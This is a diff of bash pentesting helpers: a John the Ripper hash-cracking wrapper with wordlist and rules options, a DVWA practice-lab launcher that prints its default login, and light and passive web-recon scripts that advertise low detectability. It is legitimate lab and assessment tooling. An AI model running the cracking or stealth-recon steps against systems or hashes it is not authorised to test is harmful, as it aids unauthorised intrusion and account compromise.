    if [[ -n "$format" ]]; then
        john_args+=("--format=$format")
        echo -e "${CYAN}[*]${NC} Format: $format"
    fi

    if [[ -n "$wordlist" ]]; then
        if [[ "$wordlist" == *.gz ]]; then
            echo -e "${CYAN}[*]${NC} Wordlist: $wordlist (gzipped)"
        else
            echo -e "${CYAN}[*]${NC} Wordlist: $wordlist"
        fi
    else
        # Fall back to the first wordlist installed on this system
        wordlist=$(find_wordlist)
        if [[ -n "$wordlist" ]]; then
            echo -e "${CYAN}[*]${NC} Using default wordlist: $wordlist"
        fi
    fi

    if [[ -n "$wordlist" ]]; then
        if [[ "$wordlist" == *.gz ]]; then
            # Inflate to a throwaway file; covers the default-wordlist
            # path too (rockyou.txt.gz was previously passed raw)
            tmp_wordlist=$(mktemp)
            zcat -- "$wordlist" > "$tmp_wordlist"
            john_args+=("--wordlist=$tmp_wordlist")
        else
            john_args+=("--wordlist=$wordlist")
        fi
    fi

    if [[ "$rules" == "true" ]]; then
        john_args+=("--rules")
        echo -e "${CYAN}[*]${NC} Rules: enabled"
    fi

    echo
    echo -e "${GREEN}[*]${NC} Starting crack..."
    echo

    # Capture john's status so the temp wordlist is always cleaned up,
    # then propagate it (set -e in the caller handles failure).
    # NOTE: empty-array expansion needs bash >= 4.4 under `set -u`.
    local status=0
    john "${john_args[@]}" "$hashfile" || status=$?

    if [[ -n "$tmp_wordlist" ]]; then
        rm -f -- "$tmp_wordlist"
    fi
    return "$status"
}
|
||||||
|
|
||||||
|
# Show cracked passwords
|
||||||
|
# Display john's pot-file results for a given hash file.
show_cracked() {
    local hashfile="$1"

    printf '%b\n' "${CYAN}[*]${NC} Cracked passwords for: ${BOLD}$hashfile${NC}"
    printf '\n'

    # Guard clause instead of the original if/else — same behavior
    if ! command -v john &>/dev/null; then
        printf '%b\n' "${RED}Error:${NC} John not available"
        exit 1
    fi

    john --show "$hashfile"
}
|
||||||
|
|
||||||
|
# Parse arguments
|
||||||
|
# ---- Argument parsing and command dispatch ----
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
    show_help
    exit 0
fi

cmd="$1"
shift

case "$cmd" in
    identify|id)
        if [[ $# -lt 1 ]]; then
            echo -e "${RED}Error:${NC} Usage: crack identify <hash>"
            exit 1
        fi
        identify_hash "$1"
        ;;
    show)
        if [[ $# -lt 1 ]]; then
            echo -e "${RED}Error:${NC} Usage: crack show <hashfile>"
            exit 1
        fi
        show_cracked "$1"
        ;;
    *)
        # Anything else is treated as a hash file to crack
        hashfile="$cmd"

        if [[ ! -f "$hashfile" ]]; then
            echo -e "${RED}Error:${NC} Hash file not found: $hashfile"
            exit 1
        fi

        # Crack options
        format=""
        wordlist=""
        rules=false

        while [[ $# -gt 0 ]]; do
            case $1 in
                -w|--wordlist)
                    wordlist="$2"
                    shift 2
                    ;;
                -m|--mode|-f|--format)
                    format="$2"
                    shift 2
                    ;;
                -r|--rules)
                    rules=true
                    shift
                    ;;
                *)
                    echo -e "${RED}Error:${NC} Unknown option: $1"
                    exit 1
                    ;;
            esac
        done

        cracker=$(get_cracker)

        case "$cracker" in
            john)
                crack_john "$hashfile" "$format" "$wordlist" "$rules"
                ;;
            hashcat)
                echo -e "${YELLOW}⚠${NC} Hashcat support not yet implemented"
                echo "Use John the Ripper or implement hashcat wrapper"
                exit 1
                ;;
        esac
        ;;
esac
|
||||||
184
scripts/pentesting/dvwa
Executable file
184
scripts/pentesting/dvwa
Executable file
|
|
@ -0,0 +1,184 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: dvwa
# Description: Damn Vulnerable Web Application launcher
# Usage: dvwa start|stop|status|logs

VERSION="1.0.0"

# Colors
# ANSI escape sequences, rendered throughout the script via `echo -e`.
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly CYAN='\033[0;36m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'  # reset / "no color"

# Docker settings for the DVWA instance.
CONTAINER_NAME="dvwa"
IMAGE="vulnerables/web-dvwa"
DEFAULT_PORT="8080"  # host port; auto-incremented if busy (see find_available_port)
||||||
|
# Find available port
# Echo the first free TCP port at or above the requested one.
# Arguments: $1 - starting port (default 8080)
# Outputs:   chosen port on stdout; "port in use" warnings on stderr
find_available_port() {
    local port="${1:-8080}"
    # Probe with lsof, falling back to netstat. Listing listening sockets
    # does not require root, so no sudo here: the previous `sudo netstat`
    # could block a non-interactive run on a password prompt.
    while lsof -Pi ":$port" -sTCP:LISTEN -t >/dev/null 2>&1 \
        || netstat -tuln 2>/dev/null | grep -q ":$port "; do
        echo -e "${YELLOW}⚠${NC} Port $port in use, trying next..." >&2
        port=$((port + 1))
    done
    echo "$port"
}
|
||||||
|
|
||||||
|
# Print usage, commands, examples, default credentials and setup steps.
# Lines may contain ANSI escapes, so everything goes through printf '%b'
# (interprets backslash escapes like echo -e, one line per argument).
show_help() {
    printf '%b\n' \
        "${BOLD}dvwa${NC} - DVWA Launcher v${VERSION}" \
        "" \
        "${BOLD}USAGE:${NC}" \
        " dvwa <command>" \
        "" \
        "${BOLD}COMMANDS:${NC}" \
        " ${CYAN}start${NC} Start DVWA" \
        " ${CYAN}stop${NC} Stop DVWA" \
        " ${CYAN}restart${NC} Restart DVWA" \
        " ${CYAN}status${NC} Check if running" \
        " ${CYAN}logs${NC} Show container logs" \
        " ${CYAN}shell${NC} Open shell in container" \
        "" \
        "${BOLD}EXAMPLES:${NC}" \
        " dvwa start # Launch DVWA" \
        " dvwa stop # Stop DVWA" \
        " dvwa logs # View logs" \
        "" \
        "${BOLD}ACCESS:${NC}" \
        " URL: ${BOLD}http://localhost:\$PORT${NC} (default: 8080, auto-detects if in use)" \
        " Username: ${BOLD}admin${NC}" \
        " Password: ${BOLD}password${NC}" \
        "" \
        "${BOLD}SETUP:${NC}" \
        " 1. Navigate to http://localhost" \
        " 2. Click 'Create / Reset Database' button" \
        " 3. Login with admin/password" \
        " 4. Set Security Level (low/medium/high/impossible)" \
        "" \
        "${BOLD}ABOUT:${NC}" \
        " DVWA - Damn Vulnerable Web Application" \
        " Perfect for testing: SQLi, XSS, CSRF, Command Injection, etc." \
        " Docs: https://github.com/digininja/DVWA"
}
|
||||||
|
|
||||||
|
# Abort the script with exit 1 if the docker CLI is not on PATH.
check_docker() {
    if command -v docker >/dev/null 2>&1; then
        return 0
    fi
    echo -e "${RED}Error:${NC} Docker not installed"
    exit 1
}
|
||||||
|
|
||||||
|
# Start DVWA: reuse a running container, restart a stopped one, or pull
# the image and create a new container on the first free host port.
# Globals: reads CONTAINER_NAME, IMAGE, DEFAULT_PORT; sets PORT, CURRENT_PORT.
start_dvwa() {
    # Find available port only when starting
    PORT=$(find_available_port "$DEFAULT_PORT")

    if docker ps -a --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
        if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
            echo -e "${YELLOW}⚠${NC} DVWA already running"
            CURRENT_PORT=$(docker port "$CONTAINER_NAME" 80 2>/dev/null | cut -d: -f2)
            echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${CURRENT_PORT}${NC}"
            return 0
        else
            echo -e "${CYAN}[*]${NC} Starting existing container..."
            docker start "$CONTAINER_NAME"
            # A restarted container keeps its ORIGINAL port mapping, which
            # can differ from the freshly probed $PORT - report the real one
            # (previously the script could print the wrong URL here).
            CURRENT_PORT=$(docker port "$CONTAINER_NAME" 80 2>/dev/null | cut -d: -f2)
            if [[ -n "$CURRENT_PORT" ]]; then
                PORT="$CURRENT_PORT"
            fi
        fi
    else
        echo -e "${CYAN}[*]${NC} Pulling ${IMAGE}..."
        docker pull "$IMAGE"
        echo -e "${CYAN}[*]${NC} Starting DVWA..."
        docker run -d --name "$CONTAINER_NAME" -p "${PORT}:80" "$IMAGE"
    fi

    echo -e "${GREEN}✓${NC} DVWA started"
    if [[ "$PORT" != "$DEFAULT_PORT" ]]; then
        echo -e "${YELLOW}⚠${NC} Using port ${PORT} (default ${DEFAULT_PORT} was in use)"
    fi
    echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${PORT}${NC}"
    echo -e "${CYAN}[*]${NC} Login: ${BOLD}admin / password${NC}"
    echo
    echo -e "${YELLOW}Note:${NC} First time? Click 'Create / Reset Database' at the bottom"
}
|
||||||
|
|
||||||
|
# Stop the DVWA container; prints a warning when it is not running.
stop_dvwa() {
    if ! docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
        echo -e "${YELLOW}⚠${NC} DVWA not running"
        return 0
    fi
    echo -e "${CYAN}[*]${NC} Stopping DVWA..."
    docker stop "$CONTAINER_NAME"
    echo -e "${GREEN}✓${NC} DVWA stopped"
}
|
||||||
|
|
||||||
|
# Restart DVWA: stop, wait briefly, then start again.
restart_dvwa() {
    stop_dvwa
    # Brief pause so Docker releases the container name/port before restart.
    sleep 2
    start_dvwa
}
|
||||||
|
|
||||||
|
# Report whether the DVWA container is running and how to reach it.
show_status() {
    if ! docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
        echo -e "${RED}●${NC} DVWA is ${RED}stopped${NC}"
        return 0
    fi
    echo -e "${GREEN}●${NC} DVWA is ${GREEN}running${NC}"
    CURRENT_PORT=$(docker port "$CONTAINER_NAME" 80 2>/dev/null | cut -d: -f2)
    echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${CURRENT_PORT}${NC}"
    echo -e "${CYAN}[*]${NC} Login: ${BOLD}admin / password${NC}"
    # Header row plus the DVWA line from `docker ps`.
    docker ps --format "table {{.Names}}\t{{.Status}}\t{{.Ports}}" | grep -E "(NAMES|${CONTAINER_NAME})"
}
|
||||||
|
|
||||||
|
# Follow the container logs; exits 1 if DVWA is not running.
show_logs() {
    if ! docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
        echo -e "${RED}Error:${NC} DVWA not running"
        exit 1
    fi
    docker logs -f "$CONTAINER_NAME"
}
|
||||||
|
|
||||||
|
# Open an interactive bash shell inside the container; exits 1 if stopped.
open_shell() {
    if ! docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
        echo -e "${RED}Error:${NC} DVWA not running"
        exit 1
    fi
    docker exec -it "$CONTAINER_NAME" /bin/bash
}
|
||||||
|
|
||||||
|
# Main
# Require docker up-front, then dispatch on the first CLI argument.
check_docker

if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
    show_help
    exit 0
fi

case "$1" in
    start|up)       start_dvwa ;;
    stop|down)      stop_dvwa ;;
    restart)        restart_dvwa ;;
    status)         show_status ;;
    logs)           show_logs ;;
    shell|sh|bash)  open_shell ;;
    *)
        echo -e "${RED}Error:${NC} Unknown command: $1"
        echo "Run 'dvwa --help' for usage"
        exit 1
        ;;
esac
|
||||||
233
scripts/pentesting/light-recon
Executable file
233
scripts/pentesting/light-recon
Executable file
|
|
@ -0,0 +1,233 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: light-recon
# Description: Light web reconnaissance (browser-like, low detectability)
# Usage: light-recon <url>
# Tier 2: Between passive and active - mimics normal browsing

VERSION="1.0.0"

# Colors
# ANSI escape sequences, rendered via `echo -e` throughout.
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly MAGENTA='\033[0;35m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'  # reset / "no color"

# Status indicators
# Pre-colored log prefixes used in scan output.
readonly GREENPLUS="${GREEN}[+]${NC}"
readonly GREENSTAR="${YELLOW}[*]${NC}"
readonly REDMINUS="${RED}[-]${NC}"
readonly REDEXCLAIM="${RED}[!]${NC}"
||||||
|
# Print usage, scope (what light recon does and does not do), examples,
# output location and detectability notes. printf '%b' interprets the
# ANSI escapes the same way echo -e does, one line per argument.
show_help() {
    printf '%b\n' \
        "${BOLD}light-recon${NC} - Light Web Reconnaissance v${VERSION}" \
        "" \
        "${BOLD}USAGE:${NC}" \
        " light-recon <url>" \
        "" \
        "${BOLD}DESCRIPTION:${NC}" \
        " Browser-like reconnaissance with low detectability" \
        " Creates tmux window with 3 panes:" \
        " - Pane 1 (left): httpx (HTTP probing with tech detection)" \
        " - Pane 2 (top-right): gowitness (visual screenshots)" \
        " - Pane 3 (bottom-right): results dashboard" \
        "" \
        "${BOLD}WHAT IS LIGHT RECON?${NC}" \
        " ✓ HTTP/HTTPS probing (looks like normal browser request)" \
        " ✓ Screenshot capture (headless browser)" \
        " ✓ Technology fingerprinting (Wappalyzer-style)" \
        " ✓ Security headers analysis" \
        " ✓ SSL/TLS information" \
        " ✓ Redirect chain following" \
        "" \
        " ✗ No directory brute-forcing" \
        " ✗ No vulnerability scanning" \
        " ✗ No aggressive crawling" \
        "" \
        "${BOLD}EXAMPLES:${NC}" \
        " light-recon http://target.htb" \
        " light-recon https://example.com" \
        " light-recon 10.10.10.5" \
        "" \
        "${BOLD}OUTPUT:${NC}" \
        " All results saved to: ./light-recon-<target>-<timestamp>/" \
        "" \
        "${BOLD}DETECTABILITY:${NC}" \
        " 🟡 Low - Appears as normal browser traffic" \
        " Safe for bug bounty initial recon phase" \
        " Use before aggressive scanning (web-recon)"
}
|
||||||
|
|
||||||
|
# Check required tools
# tmux is a hard requirement; httpx/gowitness are optional - missing ones
# produce a warning plus go-install hints, and their scans are skipped.
check_tools() {
    local missing=()
    local optional_missing=()

    # Core tools
    command -v tmux &>/dev/null || missing+=("tmux")

    # Light recon tools (all optional but warn)
    local tool
    for tool in httpx gowitness; do
        command -v "$tool" &>/dev/null || optional_missing+=("$tool")
    done

    if [[ ${#missing[@]} -gt 0 ]]; then
        echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
        exit 1
    fi

    if [[ ${#optional_missing[@]} -gt 0 ]]; then
        echo -e "${YELLOW}⚠${NC} Optional tools missing (scans will be skipped): ${optional_missing[*]}"
        echo -e "${CYAN}Install with:${NC}"
        for tool in "${optional_missing[@]}"; do
            case "$tool" in
                httpx) echo " go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest" ;;
                gowitness) echo " go install github.com/sensepost/gowitness@latest" ;;
            esac
        done
        echo
    fi
}
|
||||||
|
|
||||||
|
# Create output directory
# Build a per-run output directory name from the target URL and create it
# (plus a screenshots/ subdirectory). Sets the global OUTPUT_DIR.
# Arguments: $1 - target URL
setup_output_dir() {
    local url="$1"
    local timestamp
    timestamp=$(date +%Y%m%d-%H%M%S)

    # Strip the protocol prefix, then replace path separators with '_'.
    # (The old `tr -d 'http'` deleted every h/t/p CHARACTER anywhere in
    # the name, mangling hosts like "example.com" -> "examle.com".)
    local clean_url="${url#http://}"
    clean_url="${clean_url#https://}"
    clean_url=$(echo "$clean_url" | tr '/:' '_')

    OUTPUT_DIR="light-recon-${clean_url}-${timestamp}"
    mkdir -p "$OUTPUT_DIR"
    mkdir -p "$OUTPUT_DIR/screenshots"

    echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
}
|
||||||
|
|
||||||
|
# Main light-recon function
# Orchestrate the run: normalize the URL, create the output directory,
# then either build a 3-pane tmux dashboard (when already inside tmux)
# or fall back to sequential execution.
# Globals:   sets OUTPUT_DIR (via setup_output_dir) and WINDOW_NAME.
# Arguments: $1 - target URL (protocol optional; http:// assumed)
run_light_recon() {
    local url="$1"

    # Ensure URL has http:// or https://
    if [[ ! "$url" =~ ^https?:// ]]; then
        url="http://$url"
        echo -e "${YELLOW}⚠${NC} No protocol specified, using: $url"
    fi

    # Banner
    echo -e "${CYAN}${BOLD}"
    echo "╔════════════════════════════════════════════════════════════╗"
    echo "║ Light Web Reconnaissance (Browser-Like) ║"
    echo "║ Target: $url"
    echo "╚════════════════════════════════════════════════════════════╝"
    echo -e "${NC}"

    # Create output directory
    setup_output_dir "$url"

    # Check if in tmux - without a tmux session, run the scans inline.
    if [[ -z "${TMUX:-}" ]]; then
        echo -e "${YELLOW}⚠${NC} Not in tmux session - running sequentially"
        run_scans_sequential "$url"
        return
    fi

    # Create tmux window with 3 panes
    WINDOW_NAME="--> Light: ${url:0:20}... <--"
    tmux new-window -n "$WINDOW_NAME"

    # Create layout: [Left wide] [Right split top/bottom]
    # With 3 panes, tmux uses different numbering than 4-pane layouts
    # After splits: [0: left-wide] [1: top-right] [2: bottom-right]
    # NOTE(review): pane indices assume tmux pane-base-index 0 - confirm
    # against the user's tmux.conf.

    # Split horizontally (left | right)
    tmux split-window -h

    # Split right pane vertically
    tmux select-pane -t 1
    tmux split-window -v

    # Resize left pane to be wider (60/40 split)
    tmux select-pane -t 0
    tmux resize-pane -R 30

    # Final 3-pane layout:
    # 0 (left-wide) 1 (top-right)
    # 2 (bottom-right)

    # Pane 0 (left): httpx - comprehensive HTTP probing
    # The command string is expanded NOW (colors, $url, $PWD) and typed
    # into the pane's shell via send-keys; C-m presses Enter.
    tmux select-pane -t 0
    if command -v httpx &>/dev/null; then
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting httpx HTTP probing...${NC}' && echo '$url' | httpx -silent -title -tech-detect -status-code -content-length -web-server -method -ip -cname -cdn -follow-redirects -tls-probe -pipeline -json -o httpx-detailed.json 2>&1 | tee httpx.log && echo '$url' | httpx -silent -sc -title -tech-detect -web-server -ip -location -cdn -o httpx-summary.txt && echo -e '${GREEN}✓ httpx complete${NC}' && echo && echo -e '${CYAN}Summary:${NC}' && cat httpx-summary.txt" C-m
    else
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ httpx not installed - skipping${NC}'" C-m
    fi

    # Pane 1 (top-right): gowitness - screenshot capture
    tmux select-pane -t 1
    if command -v gowitness &>/dev/null; then
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting gowitness screenshot capture...${NC}' && gowitness single '$url' --screenshot-path=./screenshots/ --disable-logging --timeout 30 2>&1 | tee gowitness.log && echo -e '${GREEN}✓ gowitness complete${NC}' && echo && ls -lh screenshots/ | tail -5" C-m
    else
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ gowitness not installed - skipping${NC}'" C-m
    fi

    # Pane 2 (bottom-right): Live results dashboard
    # Polls the output files every 5s until the user presses Ctrl+C.
    tmux select-pane -t 2
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${CYAN}╔══════════════════════════════════════════════╗${NC}' && echo -e '${CYAN}║ LIGHT RECON RESULTS DASHBOARD ║${NC}' && echo -e '${CYAN}╚══════════════════════════════════════════════╝${NC}' && echo -e '${YELLOW}[*] Monitoring output files...${NC}' && while true; do clear; echo -e '${CYAN}═══ Scan Progress ═══${NC}'; echo; echo -e '${GREEN}HTTP Probing (httpx):${NC}'; [ -f httpx-summary.txt ] && [ -s httpx-summary.txt ] && cat httpx-summary.txt || echo ' Waiting...'; echo; echo -e '${GREEN}Screenshots (gowitness):${NC}'; [ -d screenshots ] && SCREENSHOT_COUNT=\$(ls -1 screenshots/*.png 2>/dev/null | wc -l) && echo \" Captured: \$SCREENSHOT_COUNT screenshot(s)\" && ls -1 screenshots/*.png 2>/dev/null | head -3 || echo ' Waiting...'; echo; echo -e '${GREEN}Technology Detection:${NC}'; [ -f httpx-detailed.json ] && [ -s httpx-detailed.json ] && jq -r '.tech[]' httpx-detailed.json 2>/dev/null | sort -u | sed 's/^/ - /' | head -10 || echo ' Waiting...'; echo; echo -e '${YELLOW}[Press Ctrl+C to stop monitoring]${NC}'; sleep 5; done" C-m

    # Focus back on httpx pane
    tmux select-pane -t 0

    echo
    echo -e "${GREEN}✓${NC} Tmux light-recon window created"
    echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}--> Light: ${url:0:20}... <--${NC}"
    echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
    echo
    echo -e "${YELLOW}Note:${NC} Light recon appears as normal browser traffic"
    echo -e "${YELLOW}Note:${NC} Screenshots saved to screenshots/ subdirectory"
}
|
||||||
|
|
||||||
|
# Sequential execution (when not in tmux)
# Fallback used when $TMUX is unset: run httpx then gowitness inline,
# working inside OUTPUT_DIR and returning to the parent afterwards.
# Globals:   reads OUTPUT_DIR (set by setup_output_dir).
# Arguments: $1 - target URL
run_scans_sequential() {
    local url="$1"

    # NOTE(review): the matching `cd ..` below assumes OUTPUT_DIR is a
    # single path component - true as produced by setup_output_dir.
    cd "$OUTPUT_DIR"

    echo -e "\n${GREENSTAR} Running httpx...${NC}"
    if command -v httpx &>/dev/null; then
        echo "$url" | httpx -silent -title -tech-detect -status-code -web-server -ip -o httpx-summary.txt
        cat httpx-summary.txt
    fi

    echo -e "\n${GREENSTAR} Running gowitness...${NC}"
    if command -v gowitness &>/dev/null; then
        gowitness single "$url" --screenshot-path=./screenshots/ --disable-logging --timeout 30
        ls -lh screenshots/
    fi

    cd ..

    echo -e "\n${GREEN}✓${NC} Light recon complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
}
|
||||||
|
|
||||||
|
# Parse arguments
# Entry point: show help when asked (or with no args), validate the
# target, verify tooling, then kick off the recon run.
if (( $# == 0 )) || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
    show_help
    exit 0
fi

url="$1"

# Validate URL (defensive: the zero-arg case is already handled above)
if [[ -z "$url" ]]; then
    echo -e "${RED}Error:${NC} URL required"
    echo "Usage: light-recon <url>"
    exit 1
fi

# Check tools
check_tools

# Run light reconnaissance
run_light_recon "$url"
|
||||||
273
scripts/pentesting/passive-recon
Executable file
273
scripts/pentesting/passive-recon
Executable file
|
|
@ -0,0 +1,273 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: passive-recon
# Description: Truly passive reconnaissance (no direct target contact)
# Usage: passive-recon <domain>

VERSION="1.0.0"

# Colors
# ANSI escape sequences, rendered via `echo -e` throughout.
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly MAGENTA='\033[0;35m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'  # reset / "no color"

# Status indicators
# Pre-colored log prefixes used in scan output.
readonly GREENPLUS="${GREEN}[+]${NC}"
readonly GREENSTAR="${YELLOW}[*]${NC}"
readonly REDMINUS="${RED}[-]${NC}"
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||||
|
# Print usage, the passive-only scope, examples, output location and the
# rationale for passive recon. printf '%b' interprets the ANSI escapes
# the same way echo -e does, one line per argument.
show_help() {
    printf '%b\n' \
        "${BOLD}passive-recon${NC} - Truly Passive Reconnaissance v${VERSION}" \
        "" \
        "${BOLD}USAGE:${NC}" \
        " passive-recon <domain>" \
        "" \
        "${BOLD}DESCRIPTION:${NC}" \
        " Performs 100% PASSIVE reconnaissance with ZERO target contact" \
        " All data gathered from third-party sources (DNS, certs, archives)" \
        "" \
        "${BOLD}WHAT IS PASSIVE?${NC}" \
        " ✓ DNS lookups (public records)" \
        " ✓ Certificate transparency logs" \
        " ✓ Wayback Machine archives" \
        " ✓ WHOIS lookups" \
        " ✓ Shodan/censys (if API keys configured)" \
        " ✓ GitHub dorking" \
        " ✓ Subfinder/amass (passive mode)" \
        "" \
        " ✗ Port scanning (sends packets)" \
        " ✗ Directory brute-forcing (sends HTTP requests)" \
        " ✗ Web crawling (touches target)" \
        "" \
        "${BOLD}EXAMPLES:${NC}" \
        " passive-recon example.com" \
        " passive-recon target.htb" \
        "" \
        "${BOLD}OUTPUT:${NC}" \
        " All results saved to: ./passive-recon-<domain>-<timestamp>/" \
        "" \
        "${BOLD}WHY PASSIVE?${NC}" \
        " • Undetectable (no IDS/IPS alerts)" \
        " • Safe for bug bounty recon phase" \
        " • Legal (public information only)" \
        " • Fast (no rate limiting)"
}
|
||||||
|
|
||||||
|
# Check required tools
# tmux/dig/whois/curl/jq are hard requirements; subfinder, amass,
# waybackurls and gau are optional - missing ones produce a warning with
# go-install hints, and their scans are skipped.
check_tools() {
    local missing=()
    local optional_missing=()
    local tool

    # Core tools
    for tool in tmux dig whois curl jq; do
        command -v "$tool" &>/dev/null || missing+=("$tool")
    done

    # Optional tools (all passive)
    for tool in subfinder amass waybackurls gau; do
        command -v "$tool" &>/dev/null || optional_missing+=("$tool")
    done

    if [[ ${#missing[@]} -gt 0 ]]; then
        echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
        exit 1
    fi

    if [[ ${#optional_missing[@]} -gt 0 ]]; then
        echo -e "${YELLOW}⚠${NC} Optional tools missing (some scans will be skipped): ${optional_missing[*]}"
        echo -e "${CYAN}Install with:${NC}"
        for tool in "${optional_missing[@]}"; do
            case "$tool" in
                subfinder) echo " go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest" ;;
                amass) echo " go install -v github.com/owasp-amass/amass/v4/...@master" ;;
                waybackurls) echo " go install github.com/tomnomnom/waybackurls@latest" ;;
                gau) echo " go install github.com/lc/gau/v2/cmd/gau@latest" ;;
            esac
        done
        echo
    fi
}
|
||||||
|
|
||||||
|
# Create output directory
# Build a per-run output directory name from the domain and create it.
# Sets the global OUTPUT_DIR.
# Arguments: $1 - target domain (protocol prefix tolerated)
setup_output_dir() {
    local domain="$1"
    local timestamp
    timestamp=$(date +%Y%m%d-%H%M%S)

    # Strip any protocol prefix, then replace path separators with '_'.
    # (The old `tr -d 'http'` deleted every h/t/p CHARACTER anywhere in
    # the name, mangling domains like "example.com" -> "examle.com".)
    local clean_domain="${domain#http://}"
    clean_domain="${clean_domain#https://}"
    clean_domain=$(echo "$clean_domain" | tr '/:' '_')

    OUTPUT_DIR="passive-recon-${clean_domain}-${timestamp}"
    mkdir -p "$OUTPUT_DIR"

    echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
}
|
||||||
|
|
||||||
|
# Check if target is localhost
# Returns 0 when the domain is exactly a loopback target
# (localhost, 127.0.0.1, 0.0.0.0 or ::1), 1 otherwise.
check_localhost() {
    local domain="$1"

    case "$domain" in
        localhost|127.0.0.1|0.0.0.0|::1)
            return 0 # Is localhost
            ;;
        *)
            return 1 # Not localhost
            ;;
    esac
}
|
||||||
|
|
||||||
|
# Main passive-recon function
# Orchestrate the run: normalize the domain, refuse localhost targets,
# create the output directory, then either build a 4-pane tmux dashboard
# (when already inside tmux) or fall back to sequential execution.
# Globals:   sets OUTPUT_DIR (via setup_output_dir).
# Arguments: $1 - target domain (protocol/path stripped here)
run_passive_recon() {
    local domain="$1"

    # Strip http:// if provided (and any trailing path)
    domain=$(echo "$domain" | sed 's~https\?://~~g' | sed 's~/.*~~g')

    # Check if target is localhost - passive sources have nothing on it.
    if check_localhost "$domain"; then
        echo -e "${RED}${BOLD}"
        echo "╔════════════════════════════════════════════════════════════╗"
        echo "║ ⚠️ LOCALHOST DETECTED ⚠️ ║"
        echo "║ ║"
        echo "║ Passive recon doesn't work on localhost! ║"
        echo "║ No DNS records, certificates, or wayback data exists. ║"
        echo "║ ║"
        echo "║ Use instead: ║"
        echo "║ web-recon http://localhost:PORT ║"
        echo "║ web-attack http://localhost:PORT ║"
        echo "╚════════════════════════════════════════════════════════════╝"
        echo -e "${NC}"
        exit 1
    fi

    # Banner
    echo -e "${CYAN}${BOLD}"
    echo "╔════════════════════════════════════════════════════════════╗"
    echo "║ Passive Reconnaissance (Zero Target Contact) ║"
    echo "║ Domain: $domain"
    echo "╚════════════════════════════════════════════════════════════╝"
    echo -e "${NC}"

    # Create output directory
    setup_output_dir "$domain"

    # Check if in tmux - without a tmux session, run the scans inline.
    if [[ -z "${TMUX:-}" ]]; then
        echo -e "${YELLOW}⚠${NC} Not in tmux session - running sequentially"
        run_scans_sequential "$domain"
        return
    fi

    # Create tmux window with 4 panes
    tmux new-window -n "--> Passive: ${domain:0:15}... <--"

    # Split into 4 panes (2x2 grid)
    # CRITICAL: Tmux renumbers panes during splits
    # After all splits complete, panes are numbered: 1, 2, 3, 4 (NOT 0, 1, 2, 3)
    # [1: DNS/WHOIS] [2: Cert Transparency]
    # [3: Wayback] [4: Subdomain Enum ]
    # NOTE(review): 1-based targets suggest tmux pane-base-index 1 is
    # assumed - confirm against the user's tmux.conf (the -t 0 / -t 2
    # targets during splitting below use pre-renumbering indices).

    # Create 2x2 grid layout
    tmux split-window -h
    tmux select-pane -t 0
    tmux split-window -v
    tmux select-pane -t 2
    tmux split-window -v

    # Force tiled layout for perfect 2x2 grid (equal-sized panes)
    tmux select-layout tiled

    # Final pane layout after tmux renumbering: 1 (TL), 2 (TR), 3 (BL), 4 (BR)

    # Pane 1 (top-left): DNS enumeration and WHOIS
    # Command strings are expanded NOW (colors, $domain, $PWD) and typed
    # into each pane's shell via send-keys; C-m presses Enter.
    tmux select-pane -t 1
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} DNS & WHOIS lookup...${NC}' && dig '$domain' ANY +noall +answer | tee dns.txt && echo && whois '$domain' | tee whois.txt && echo -e '${GREEN}✓ DNS/WHOIS complete${NC}'" C-m

    # Pane 2 (top-right): Certificate Transparency logs
    tmux select-pane -t 2
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Certificate Transparency logs...${NC}' && curl -s 'https://crt.sh/?q=%.$domain&output=json' | jq -r '.[].name_value' 2>/dev/null | sed 's/\*\.//g' | sort -u | tee subdomains-crt.txt && echo -e '${GREEN}✓ Cert transparency complete${NC}'" C-m

